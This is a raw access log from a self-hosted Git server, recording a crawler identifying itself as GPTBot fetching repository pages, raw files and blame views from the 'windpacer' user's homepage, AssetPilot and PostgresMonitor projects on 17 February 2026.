"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 9861] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 725] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 74.7.227.38] [Length 23742] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" -[17/Feb/2026:13:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14202] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" -[17/Feb/2026:13:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13654] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16475] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" -[17/Feb/2026:13:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14814] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" -[17/Feb/2026:13:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" -[17/Feb/2026:13:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14591] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" -[17/Feb/2026:13:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15548] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" -[17/Feb/2026:13:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13932] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" -[17/Feb/2026:13:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 74.7.227.38] [Length 9880] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" -[17/Feb/2026:13:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 4275100] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" -[17/Feb/2026:13:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" -[17/Feb/2026:13:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" -[17/Feb/2026:13:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 74.7.227.38] [Length 22723] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" -[17/Feb/2026:13:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" -[17/Feb/2026:13:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" -[17/Feb/2026:13:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 74.7.227.38] [Length 14350] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" -[17/Feb/2026:13:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 74.7.227.38] [Length 7506] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:13:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:13:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13784] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/wiki" [Client 74.7.227.38] [Length 7372] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" [Client 74.7.227.38] [Length 10418] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" [Client 74.7.227.38] [Length 12389] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 74.7.227.38] [Length 25663] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" -[17/Feb/2026:13:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" -[17/Feb/2026:13:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" -[17/Feb/2026:13:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 74.7.227.38] [Length 7500] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb" -[17/Feb/2026:13:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 15937] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 15904] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14852] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" -[17/Feb/2026:13:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13970] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" -[17/Feb/2026:13:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14240] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" -[17/Feb/2026:13:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" -[17/Feb/2026:13:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12238] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" -[17/Feb/2026:13:48:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" -[17/Feb/2026:13:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11999] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" -[17/Feb/2026:13:48:11 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" -[17/Feb/2026:13:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14991] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" -[17/Feb/2026:13:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" -[17/Feb/2026:13:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14329] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:13:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist" -[17/Feb/2026:13:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11781] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10195] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10169] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10916] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 